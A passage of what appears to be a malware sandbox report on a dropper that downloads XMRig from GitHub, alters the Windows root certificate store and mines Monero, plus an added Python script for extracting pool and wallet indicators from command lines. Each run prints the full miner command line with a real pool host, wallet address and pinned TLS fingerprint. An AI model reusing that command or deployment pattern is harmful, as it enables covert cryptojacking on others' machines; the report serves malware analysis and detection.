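    for key, value in summarize(parse_cert_blob(bytes.fromhex(REPORT_BLOB_PREFIX_HEX))).items():
        print(f"{key:44s} {value}")
    print("round-trip self-check:", self_check())
```

On a live host the same check runs against the exported registry value (`reg export` or `Get-ItemPropertyValue` on the Blob) with the full certificate record present; a False from `thumbprint_consistent` means the key name and the stored certificate disagree, which never happens for entries the automatic root update wrote.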
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4468 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4468 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
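The process tree is identical in every run above: the dropper (`main - Copy (N).exe`) fetches and launches xmrig.exe, writes into the child it just created, and the child then requests SeLockMemoryPrivilege, which stock XMRig does to allocate large pages for its RandomX dataset; none of that distinguishes this deployment from any other. The durable indicators are on the command line: the pool host and port, the `--user` value, which on a Monero pool is a wallet address rather than a login, `--tls` toward port 80 rather than a stratum port, and a pinned pool-certificate SHA-256 in `--tls-fingerprint`. The script below is an added example, not sandbox output and not XMRig's code. It pulls those fields out of process-creation command lines using XMRig's documented option names, using the report's command line verbatim as one sample and two constructed lines (an invented `updater.exe` launch with a dummy wallet and the `--opt=value` spelling, and a benign notepad launch) as the others.

```python
"""Extract mining-pool indicators from XMRig command lines.

Added example for this report; it is not part of the sandbox output and not
XMRig's code. Option names follow XMRig's documented CLI (-o/--url, -u/--user,
-p/--pass, --tls, --tls-fingerprint, --donate-level); the sample log lines
other than the report's own command line are constructed.
"""
import re
from typing import Dict, List, Optional

# Monero primary address: 95 base58 characters beginning with '4'.
# (Subaddresses begin with '8'; integrated addresses are 106 characters.)
MONERO_PRIMARY = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")

# Options that take a value, mapped to a field name; --opt=value is also accepted.
VALUE_OPTS = {
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "--tls-fingerprint": "tls_fingerprint",
    "--donate-level": "donate_level",
}
FLAG_OPTS = {"--tls": "tls", "-k": "keepalive", "--keepalive": "keepalive"}

# Command line taken verbatim from the Processes section of this report.
REPORT_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Constructed process-creation log lines (not from the sandbox).
SAMPLE_LOG = [
    REPORT_CMDLINE,
    r"C:\Users\Public\updater.exe -o stratum+tcp://pool.example.invalid:443 "
    "-u 4" + "A" * 94 + " -p x --tls --donate-level=1",
    r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt',
]


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace, keeping double-quoted arguments together; strip the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def extract_xmrig_iocs(cmdline: str) -> Optional[Dict]:
    """Return pool/wallet indicators from one command line, or None when it has no pool URL."""
    argv = tokenize(cmdline)
    opts: Dict[str, object] = {}
    i = 1                                          # argv[0] is the image path
    while i < len(argv):
        name, has_eq, inline = argv[i].partition("=")
        if name in VALUE_OPTS:
            if has_eq:
                opts[VALUE_OPTS[name]] = inline
                i += 1
            else:
                opts[VALUE_OPTS[name]] = argv[i + 1] if i + 1 < len(argv) else ""
                i += 2
            continue
        if argv[i] in FLAG_OPTS:
            opts[FLAG_OPTS[argv[i]]] = True
        i += 1
    url = opts.get("url")
    if not url:
        return None
    # XMRig accepts "host:port" or "scheme://host:port"; IPv6 literals are not handled here.
    host, _, port = str(url).split("://", 1)[-1].rpartition(":")
    if not host:                                   # no explicit port given
        host, port = port, ""
    donate = str(opts.get("donate_level", ""))
    return {
        "image": argv[0],
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": str(opts.get("user", "")),
        "password": str(opts.get("pass", "")),
        "tls": bool(opts.get("tls", False)),
        "tls_fingerprint": str(opts.get("tls_fingerprint", "")).lower() or None,
        "donate_level": int(donate) if donate.isdigit() else None,
    }


def assess(ioc: Dict) -> List[str]:
    """Turn the parsed fields into the detection reasoning an analyst would write down."""
    notes = []
    if MONERO_PRIMARY.match(ioc["wallet"]):
        notes.append("--user is a Monero primary address: a miner wallet, not a credential")
    if ioc["tls"] and ioc["pool_port"] in (80, 443, 8080, 8443):
        notes.append(f"TLS to the pool on port {ioc['pool_port']}: blends with web traffic, plaintext stratum signatures will not fire")
    if ioc["tls_fingerprint"]:
        notes.append("pool certificate pinned via --tls-fingerprint: TLS inspection breaks the miner, and the pin itself is a stable IOC")
    if ioc["donate_level"] is not None and ioc["donate_level"] < 5:
        notes.append(f"donate-level {ioc['donate_level']}: below XMRig's 5% default, typical of deployed miners")
    return notes


def scan_command_lines(lines: List[str]) -> List[Dict]:
    """Flag lines that carry a pool URL plus a wallet-shaped --user value."""
    hits = []
    for n, line in enumerate(lines):
        ioc = extract_xmrig_iocs(line)
        if ioc and MONERO_PRIMARY.match(ioc["wallet"]):
            hits.append({"line": n, **ioc, "notes": assess(ioc)})
    return hits


if __name__ == "__main__":
    for hit in scan_command_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['image']} -> {hit['pool_host']}:{hit['pool_port']} wallet={hit['wallet'][:12]}...")
        for note in hit["notes"]:
            print("   -", note)
```

The wallet regex is the part to keep: renaming xmrig.exe or dropping the `--tls-fingerprint` pin costs the operator nothing, but the `--user` value has to stay a valid Monero address or the pool credits nobody.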
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5116-16-0x000001C7AFDA0000-0x000001C7AFDC0000-memory.dmp
memory/5116-17-0x000001C7AFDF0000-0x000001C7AFE10000-memory.dmp
memory/5116-{20,25}-0x000001C7B16C0000-0x000001C7B16E0000-memory.dmp
memory/5116-{19,24}-0x000001C7B16E0000-0x000001C7B1700000-memory.dmp
memory/5116-{18,21,22,23,26..84}-0x00007FF64FBE0000-0x00007FF6506E3000-memory.dmp (63 snapshots of the same 0xB03000-byte region, consistent with the main image of PID 5116, which is xmrig.exe per the WriteProcessMemory row above)
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 identical rows; the sandbox rendered no per-hit fields for this signature)
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5084 wrote to memory of 928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4220,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=1284 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3568,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 692 wrote to memory of 3300 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:02
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1824-49-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-50-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-51-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-52-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-53-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-54-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-55-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-56-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-57-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-58-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-59-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-60-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-61-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-62-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-63-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-64-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-65-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-66-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-67-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-68-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-69-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-70-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-71-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-72-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-73-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-74-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-75-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-76-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-77-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
memory/1824-78-0x00007FF73A9A0000-0x00007FF73B4A3000-memory.dmp
